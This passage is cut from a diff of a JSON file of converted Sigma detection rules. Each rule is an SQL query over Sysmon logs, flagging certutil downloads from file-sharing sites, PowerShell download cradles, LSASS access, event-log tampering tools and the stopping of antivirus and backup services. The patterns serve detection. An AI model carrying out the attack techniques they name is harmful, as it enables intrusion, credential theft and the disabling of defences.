LIKE '%Get-Process lsas%' ESCAPE '\\' OR CommandLine LIKE '%ps lsas%' ESCAPE '\\' OR CommandLine LIKE '%gps lsas%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND (CommandLine LIKE '%.sys,%' ESCAPE '\\' OR CommandLine LIKE '%.sys %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_getprocess_lsass.yml" + "filename": "proc_creation_win_rundll32_sys.yml" }, { - "title": "Suspicious File Downloaded From File-Sharing Website Via 
Certutil.EXE", - "id": "42a5f1e7-9603-4f6d-97ae-3f37d130d794", + "title": "File Download Using ProtocolHandler.exe", + "id": "104cdb48-a7a8-4ca7-a453-32942c6e5dcb", "status": "experimental", - "description": "Detects the execution of certutil with certain flags that allow the utility to download files from file-sharing websites.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects usage of \"ProtocolHandler\" to download files. Downloaded files will be located in the cache folder (for example - %LOCALAPPDATA%\\Microsoft\\Windows\\INetCache\\IE)", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1027" + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND (CommandLine LIKE '%.ghostbin.co/%' ESCAPE '\\' OR CommandLine LIKE '%.hastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%.paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%anonfiles.com%' ESCAPE '\\' OR CommandLine LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR CommandLine LIKE '%ddns.net%' ESCAPE '\\' OR CommandLine LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%mediafire.com%' ESCAPE '\\' OR CommandLine LIKE '%mega.nz%' ESCAPE '\\' OR CommandLine LIKE '%paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.pl%' ESCAPE '\\' OR CommandLine LIKE '%pastetext.net%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.com%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.net%' ESCAPE '\\' OR CommandLine LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%send.exploit.in%' ESCAPE '\\' OR CommandLine LIKE '%sendspace.com%' ESCAPE '\\' OR CommandLine LIKE 
'%storage.googleapis.com%' ESCAPE '\\' OR CommandLine LIKE '%transfer.sh%' ESCAPE '\\' OR CommandLine LIKE '%ufile.io%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\protocolhandler.exe' ESCAPE '\\' OR OriginalFileName = 'ProtocolHandler.exe') AND ((CommandLine LIKE '%\"ms-word%' ESCAPE '\\' AND CommandLine LIKE '%.docx\"%' ESCAPE '\\') OR CommandLine LIKE '% http%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_certutil_download_file_sharing_domains.yml" + "filename": "proc_creation_win_lolbin_protocolhandler_download.yml" }, { - "title": "HackTool - SharPersist Execution", - "id": "26488ad0-f9fd-4536-876f-52fea846a2e4", + "title": "Suspicious Use of PsLogList", + "id": "aae1243f-d8af-40d8-ab20-33fc6d0c55bc", "status": "experimental", - "description": "Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects usage of the PsLogList utility to dump event log in order to extract admin accounts and perform account discovery or delete events logs", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1053" + "attack.discovery", + "attack.t1087", + "attack.t1087.001", + "attack.t1087.002" ], "falsepositives": [ - "Unknown" + "Another tool that uses the command line switches of PsLogList", + "Legitimate use of PsLogList by an administrator" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\SharPersist.exe' ESCAPE '\\' OR Product = 'SharPersist') OR (CommandLine LIKE '% -t schtask -c %' ESCAPE '\\' OR CommandLine LIKE '% -t startupfolder -c %' ESCAPE '\\') OR (CommandLine LIKE '% -t reg -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\') OR (CommandLine LIKE '% -t 
service -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\') OR (CommandLine LIKE '% -t schtask -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'psloglist.exe' OR (Image LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist64.exe' ESCAPE '\\')) AND (CommandLine LIKE '% security%' ESCAPE '\\' OR CommandLine LIKE '% application%' ESCAPE '\\' OR CommandLine LIKE '% system%' ESCAPE '\\') AND (CommandLine LIKE '% -d%' ESCAPE '\\' OR CommandLine LIKE '% /d%' ESCAPE '\\' OR CommandLine LIKE '% -x%' ESCAPE '\\' OR CommandLine LIKE '% /x%' ESCAPE '\\' OR CommandLine LIKE '% -s%' ESCAPE '\\' OR CommandLine LIKE '% /s%' ESCAPE '\\' OR CommandLine LIKE '% -c%' ESCAPE '\\' OR CommandLine LIKE '% /c%' ESCAPE '\\' OR CommandLine LIKE '% -g%' ESCAPE '\\' OR CommandLine LIKE '% /g%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_sharpersist.yml" + "filename": "proc_creation_win_sysinternals_psloglist.yml" }, { - "title": "HackTool - SharpEvtMute Execution", - "id": "bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c", + "title": "Suspicious Execution Of PDQDeployRunner", + "id": "12b8e9f5-96b2-41e1-9a42-8c6779a5c184", "status": "experimental", - "description": "Detects the use of SharpEvtHook, a tool that tampers with the Windows event logs", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious execution of \"PDQDeployRunner\" which is part of the PDQDeploy service stack that is responsible for executing commands and packages on a remote machines", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate use of the PDQDeploy tool to execute these commands" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpEvtMute.exe' ESCAPE '\\' OR Description = 'SharpEvtMute' OR (CommandLine LIKE '%--Filter \"rule %' ESCAPE '\\' OR CommandLine LIKE '%--Encoded --Filter \\\\\"%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%PDQDeployRunner-%' ESCAPE '\\' AND ((Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\csc.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsl.exe' ESCAPE '\\') OR (Image LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\') OR (CommandLine LIKE '%iex %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%http%' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -encodedcommand %' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% -w hidden%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_sharpevtmute.yml" + "filename": "proc_creation_win_pdqdeploy_runner_susp_children.yml" }, { - "title": "Suspicious Windows Service Tampering", - "id": "ce72ef99-22f1-43d4-8695-419dcb5d9330", + "title": "PUA - AdvancedRun Execution", + "id": "d2b749ee-4225-417e-b20e-a8d2193cbb84", "status": "experimental", - "description": 
"Detects the usage of binaries such as 'net', 'sc' or 'powershell' in order to stop, pause or delete critical or important Windows services such as AV, Backup, etc. As seen being used in some ransomware scripts", - "author": "Nasreddine Bencherchali (Nextron Systems), frack113", - "tags": [ - "attack.defense_evasion", - "attack.t1489" - ], + "description": "Detects the execution of AdvancedRun utility", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Administrators or tools shutting down the services due to upgrade or removal purposes. If you experience some false positive, please consider adding filters to the parent process launching this command and not removing the entry" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%143Svc%' ESCAPE '\\' OR CommandLine LIKE '%Acronis VSS Provider%' ESCAPE '\\' OR CommandLine LIKE '%AcronisAgent%' ESCAPE '\\' OR CommandLine LIKE '%AcrSch2Svc%' ESCAPE '\\' OR CommandLine LIKE '%Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%ARSM%' ESCAPE '\\' OR CommandLine LIKE '%aswBcc%' ESCAPE '\\' OR CommandLine LIKE '%Avast Business Console Client Antivirus Service%' ESCAPE '\\' OR CommandLine LIKE '%avast! 
Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%AVG Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%avgAdminClient%' ESCAPE '\\' OR CommandLine LIKE '%AvgAdminServer%' ESCAPE '\\' OR CommandLine LIKE '%AVP1%' ESCAPE '\\' OR CommandLine LIKE '%BackupExec%' ESCAPE '\\' OR CommandLine LIKE '%bedbg%' ESCAPE '\\' OR CommandLine LIKE '%BITS%' ESCAPE '\\' OR CommandLine LIKE '%BrokerInfrastructure%' ESCAPE '\\' OR CommandLine LIKE '%Client Agent 7.60%' ESCAPE '\\' OR CommandLine LIKE '%Core Browsing Protection%' ESCAPE '\\' OR CommandLine LIKE '%Core Mail Protection%' ESCAPE '\\' OR CommandLine LIKE '%Core Scanning Server%' ESCAPE '\\' OR CommandLine LIKE '%DCAgent%' ESCAPE '\\' OR CommandLine LIKE '%EhttpSr%' ESCAPE '\\' OR CommandLine LIKE '%ekrn%' ESCAPE '\\' OR CommandLine LIKE '%Enterprise Client Service%' ESCAPE '\\' OR CommandLine LIKE '%epag%' ESCAPE '\\' OR CommandLine LIKE '%EPIntegrationService%' ESCAPE '\\' OR CommandLine LIKE '%EPProtectedService%' ESCAPE '\\' OR CommandLine LIKE '%EPRedline%' ESCAPE '\\' OR CommandLine LIKE '%EPSecurityService%' ESCAPE '\\' OR CommandLine LIKE '%EPUpdateService%' ESCAPE '\\' OR CommandLine LIKE '%EraserSvc11710%' ESCAPE '\\' OR CommandLine LIKE '%EsgShKernel%' ESCAPE '\\' OR CommandLine LIKE '%ESHASRV%' ESCAPE '\\' OR CommandLine LIKE '%FA\\_Scheduler%' ESCAPE '\\' OR CommandLine LIKE '%FirebirdGuardianDefaultInstance%' ESCAPE '\\' OR CommandLine LIKE '%FirebirdServerDefaultInstance%' ESCAPE '\\' OR CommandLine LIKE '%HealthTLService%' ESCAPE '\\' OR CommandLine LIKE '%HISSQLFDLauncherSSHAREPOINIT%' ESCAPE '\\' OR CommandLine LIKE '%hmpalertsvc%' ESCAPE '\\' OR CommandLine LIKE '%HMS%' ESCAPE '\\' OR CommandLine LIKE '%IISAdmin%' ESCAPE '\\' OR CommandLine LIKE '%IMANSVC%' ESCAPE '\\' OR CommandLine LIKE '%IMAP4Svc%' ESCAPE '\\' OR CommandLine LIKE '%KAVFS%' ESCAPE '\\' OR CommandLine LIKE '%KAVFSGT%' ESCAPE '\\' OR CommandLine LIKE '%kavfsslp%' ESCAPE '\\' OR CommandLine LIKE '%klbackupdisk%' ESCAPE '\\' OR CommandLine LIKE 
'%klbackupflt%' ESCAPE '\\' OR CommandLine LIKE '%klflt%' ESCAPE '\\' OR CommandLine LIKE '%klhk%' ESCAPE '\\' OR CommandLine LIKE '%KLIF%' ESCAPE '\\' OR CommandLine LIKE '%klim6%' ESCAPE '\\' OR CommandLine LIKE '%klkbdflt%' ESCAPE '\\' OR CommandLine LIKE '%klmouflt%' ESCAPE '\\' OR CommandLine LIKE '%klnagent%' ESCAPE '\\' OR CommandLine LIKE '%klpd%' ESCAPE '\\' OR CommandLine LIKE '%kltap%' ESCAPE '\\' OR CommandLine LIKE '%KSDE1.0.0%' ESCAPE '\\' OR CommandLine LIKE '%LogProcessorService%' ESCAPE '\\' OR CommandLine LIKE '%M8EndpointAgent%' ESCAPE '\\' OR CommandLine LIKE '%macmnsvc%' ESCAPE '\\' OR CommandLine LIKE '%masvc%' ESCAPE '\\' OR CommandLine LIKE '%MBAMService%' ESCAPE '\\' OR CommandLine LIKE '%MBCloudEA%' ESCAPE '\\' OR CommandLine LIKE '%MBEndpointAgent%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeDLPAgentService%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeEngineService%' ESCAPE '\\' OR CommandLine LIKE '%MCAFEEEVENTPARSERSRV%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeFramework%' ESCAPE '\\' OR CommandLine LIKE '%MCAFEETOMCATSRV530%' ESCAPE '\\' OR CommandLine LIKE '%McShield%' ESCAPE '\\' OR CommandLine LIKE '%McTaskManager%' ESCAPE '\\' OR CommandLine LIKE '%mfefire%' ESCAPE '\\' OR CommandLine LIKE '%mfemms%' ESCAPE '\\' OR CommandLine LIKE '%mfevto%' ESCAPE '\\' OR CommandLine LIKE '%mfevtp%' ESCAPE '\\' OR CommandLine LIKE '%mfewc%' ESCAPE '\\' OR CommandLine LIKE '%MMS%' ESCAPE '\\' OR CommandLine LIKE '%mozyprobackup%' ESCAPE '\\' OR CommandLine LIKE '%MsDtsServer%' ESCAPE '\\' OR CommandLine LIKE '%MSExchange%' ESCAPE '\\' OR CommandLine LIKE '%msftesq1SPROO%' ESCAPE '\\' OR CommandLine LIKE '%msftesql$PROD%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$SQL\\_2008%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$SYSTEM\\_BGC%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$TPS%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$TPSAMA%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAPSTPS%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAPSTPSAMA%' ESCAPE '\\' OR CommandLine LIKE 
'%MSSQ!I.SPROFXENGAGEMEHT%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ0SHAREPOINT%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ0SOPHOS%' ESCAPE '\\' OR CommandLine LIKE '%MSSQL%' ESCAPE '\\' OR CommandLine LIKE '%MySQL%' ESCAPE '\\' OR CommandLine LIKE '%NanoServiceMain%' ESCAPE '\\' OR CommandLine LIKE '%NetMsmqActivator%' ESCAPE '\\' OR CommandLine LIKE '%ntrtscan%' ESCAPE '\\' OR CommandLine LIKE '%ofcservice%' ESCAPE '\\' OR CommandLine LIKE '%Online Protection System%' ESCAPE '\\' OR CommandLine LIKE '%OracleClientCache80%' ESCAPE '\\' OR CommandLine LIKE '%PandaAetherAgent%' ESCAPE '\\' OR CommandLine LIKE '%PccNTUpd%' ESCAPE '\\' OR CommandLine LIKE '%PDVFSService%' ESCAPE '\\' OR CommandLine LIKE '%POP3Svc%' ESCAPE '\\' OR CommandLine LIKE '%POVFSService%' ESCAPE '\\' OR CommandLine LIKE '%PSUAService%' ESCAPE '\\' OR CommandLine LIKE '%Quick Update Service%' ESCAPE '\\' OR CommandLine LIKE '%RepairService%' ESCAPE '\\' OR CommandLine LIKE '%ReportServer%' ESCAPE '\\' OR CommandLine LIKE '%ReportServer$%' ESCAPE '\\' OR CommandLine LIKE '%RESvc%' ESCAPE '\\' OR CommandLine LIKE '%RpcEptMapper%' ESCAPE '\\' OR CommandLine LIKE '%sacsvr%' ESCAPE '\\' OR CommandLine LIKE '%SamSs%' ESCAPE '\\' OR CommandLine LIKE '%SAVAdminService%' ESCAPE '\\' OR CommandLine LIKE '%SAVService%' ESCAPE '\\' OR CommandLine LIKE '%ScSecSvc%' ESCAPE '\\' OR CommandLine LIKE '%SDRSVC%' ESCAPE '\\' OR CommandLine LIKE '%SentinelAgent%' ESCAPE '\\' OR CommandLine LIKE '%SentinelHelperService%' ESCAPE '\\' OR CommandLine LIKE '%SepMasterService%' ESCAPE '\\' OR CommandLine LIKE '%ShMonitor%' ESCAPE '\\' OR CommandLine LIKE '%Smcinst%' ESCAPE '\\' OR CommandLine LIKE '%SmcService%' ESCAPE '\\' OR CommandLine LIKE '%SMTPSvc%' ESCAPE '\\' OR CommandLine LIKE '%SNAC%' ESCAPE '\\' OR CommandLine LIKE '%SntpService%' ESCAPE '\\' OR CommandLine LIKE '%Sophos%' ESCAPE '\\' OR CommandLine LIKE '%SQ1SafeOLRService%' ESCAPE '\\' OR CommandLine LIKE '%SQL Backups%' ESCAPE '\\' OR CommandLine LIKE '%SQL 
Server%' ESCAPE '\\' OR CommandLine LIKE '%SQLAgent%' ESCAPE '\\' OR CommandLine LIKE '%SQLBrowser%' ESCAPE '\\' OR CommandLine LIKE '%SQLsafe%' ESCAPE '\\' OR CommandLine LIKE '%SQLSERVERAGENT%' ESCAPE '\\' OR CommandLine LIKE '%SQLTELEMETRY%' ESCAPE '\\' OR CommandLine LIKE '%SQLWriter%' ESCAPE '\\' OR CommandLine LIKE '%SSISTELEMETRY130%' ESCAPE '\\' OR CommandLine LIKE '%SstpSvc%' ESCAPE '\\' OR CommandLine LIKE '%svcGenericHost%' ESCAPE '\\' OR CommandLine LIKE '%swc\\_service%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_filter%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_service%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_update%' ESCAPE '\\' OR CommandLine LIKE '%Symantec%' ESCAPE '\\' OR CommandLine LIKE '%Telemetryserver%' ESCAPE '\\' OR CommandLine LIKE '%ThreatLockerService%' ESCAPE '\\' OR CommandLine LIKE '%TMBMServer%' ESCAPE '\\' OR CommandLine LIKE '%TmCCSF%' ESCAPE '\\' OR CommandLine LIKE '%TmFilter%' ESCAPE '\\' OR CommandLine LIKE '%TMiCRCScanService%' ESCAPE '\\' OR CommandLine LIKE '%tmlisten%' ESCAPE '\\' OR CommandLine LIKE '%TMLWCSService%' ESCAPE '\\' OR CommandLine LIKE '%TmPfw%' ESCAPE '\\' OR CommandLine LIKE '%TmPreFilter%' ESCAPE '\\' OR CommandLine LIKE '%TmProxy%' ESCAPE '\\' OR CommandLine LIKE '%TMSmartRelayService%' ESCAPE '\\' OR CommandLine LIKE '%tmusa%' ESCAPE '\\' OR CommandLine LIKE '%Trend Micro Deep Security Manager%' ESCAPE '\\' OR CommandLine LIKE '%TrueKey%' ESCAPE '\\' OR CommandLine LIKE '%UI0Detect%' ESCAPE '\\' OR CommandLine LIKE '%UTODetect%' ESCAPE '\\' OR CommandLine LIKE '%Veeam%' ESCAPE '\\' OR CommandLine LIKE '%VeemaDep/oySvc%' ESCAPE '\\' OR CommandLine LIKE '%Veritas System Recovery%' ESCAPE '\\' OR CommandLine LIKE '%VSApiNt%' ESCAPE '\\' OR CommandLine LIKE '%VSS%' ESCAPE '\\' OR CommandLine LIKE '%W3Svc%' ESCAPE '\\' OR CommandLine LIKE '%wbengine%' ESCAPE '\\' OR CommandLine LIKE '%WdNisSvc%' ESCAPE '\\' OR CommandLine LIKE '%WeanClOudSve%' ESCAPE '\\' OR CommandLine LIKE '%Weems JY%' ESCAPE '\\' OR 
CommandLine LIKE '%WinDefend%' ESCAPE '\\' OR CommandLine LIKE '%wozyprobackup%' ESCAPE '\\' OR CommandLine LIKE '%WRSVC%' ESCAPE '\\' OR CommandLine LIKE '%Zoolz 2 Service%' ESCAPE '\\') AND ((((OriginalFileName IN ('net.exe', 'net1.exe') OR (Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\')) AND CommandLine LIKE '% stop %' ESCAPE '\\') OR ((OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND (CommandLine LIKE '%Stop-Service %' ESCAPE '\\' OR CommandLine LIKE '%Remove-Service %' ESCAPE '\\'))) OR ((OriginalFileName = 'sc.exe' OR Image LIKE '%\\\\sc.exe' ESCAPE '\\') AND (CommandLine LIKE '% stop %' ESCAPE '\\' OR CommandLine LIKE '% delete %' ESCAPE '\\' OR CommandLine LIKE '% pause %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'AdvancedRun.exe' OR (CommandLine LIKE '% /EXEFilename %' ESCAPE '\\' AND CommandLine LIKE '% /Run%' ESCAPE '\\') OR (CommandLine LIKE '% /WindowState 0%' ESCAPE '\\' AND CommandLine LIKE '% /RunAs %' ESCAPE '\\' AND CommandLine LIKE '% /CommandLine %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_service_tamper.yml" + "filename": "proc_creation_win_pua_advancedrun.yml" }, { - "title": "Computer System Reconnaissance Via Wmic.EXE", - "id": "9d7ca793-f6bd-471c-8d0f-11e68b2f0d2f", + "title": "Mshtml DLL RunHTMLApplication Abuse", + "id": "4782eb5a-a513-4523-a0ac-f3082b26ac5c", "status": "experimental", - "description": "Detects execution of wmic utility with the \"computersystem\" flag in order to obtain information about the machine such as the domain, username, model, etc.", + "description": "Detects suspicious command line using the \"mshtml.dll\" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, htpp...)", "author": "Nasreddine Bencherchali (Nextron 
Systems)", "tags": [ - "attack.discovery", - "attack.execution", - "attack.t1047" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%computersystem%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\..\\\\%' ESCAPE '\\' AND CommandLine LIKE '%mshtml%' ESCAPE '\\' AND CommandLine LIKE '%RunHTMLApplication%' ESCAPE '\\')" ], - "filename": "proc_creation_win_wmic_recon_computersystem.yml" + "filename": "proc_creation_win_rundll32_mshtml_runhtmlapplication.yml" }, { - "title": "Conhost Spawned By Suspicious Parent Process", - "id": "cbb9e3d1-2386-4e59-912e-62f1484f7a89", - "status": "experimental", - "description": "Detects when the Console Window Host (conhost.exe) process is spawned by a suspicious parent process, which could be indicative of code injection.", - "author": "Tim Rauch", + "title": "CMSTP Execution Process Creation", + "id": "7d4cdc5a-0076-40ca-aac8-f7e714570e47", + "status": "stable", + "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", + "author": "Nik Seetharaman", "tags": [ + "attack.defense_evasion", "attack.execution", - "attack.t1059" + "attack.t1218.003", + "attack.g0069", + "car.2019-04-001" ], "falsepositives": [ - "Unknown" + "Legitimate CMSTP use (unlikely in modern enterprise environments)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\conhost.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\lsass.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage 
LIKE '%\\\\smss.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\userinit.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\')) AND NOT ((ParentCommandLine LIKE '%-k apphost -s AppHostSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k imgsvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k localService -p -s RemoteRegistry%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k LocalSystemNetworkRestricted -p -s NgcSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k NetSvcs -p -s NcaSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k netsvcs -p -s NetSetupSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k netsvcs -p -s wlidsvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k NetworkService -p -s DoSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k wsappx -p -s AppXSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k wsappx -p -s ClipSVC%' ESCAPE '\\' OR ParentCommandLine LIKE '%C:\\\\Program Files (x86)\\\\Dropbox\\\\Client\\\\%' ESCAPE '\\' OR ParentCommandLine LIKE '%C:\\\\Program Files\\\\Dropbox\\\\Client\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\cmstp.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_conhost_susp_parent.yml" + "filename": "proc_creation_win_cmstp_execution_by_creation.yml" }, { - "title": "Renamed Msdt.EXE Execution", - "id": "bd1c6866-65fc-44b2-be51-5588fcff82b9", + "title": "Unusual Parent Process For Cmd.EXE", + "id": "4b991083-3d0e-44ce-8fc4-b254025d8d4b", "status": "experimental", - "description": "Detects the execution of a renamed \"Msdt.exe\" binary", - "author": "pH-T (Nextron Systems)", + "description": "Detects suspicious parent process for cmd.exe", + "author": "Tim Rauch", "tags": [ - 
"attack.defense_evasion", - "attack.t1036.003" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'msdt.exe' AND NOT (Image LIKE '%\\\\msdt.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ctfmon.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\epad.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\FlashPlayerUpdateService.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\GoogleUpdate.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\jucheck.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\jusched.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\LogonUI.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\lsass.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\SearchIndexer.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\SearchProtocolHost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\SIHClient.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\sihost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\slui.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\sppsvc.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\unsecapp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR 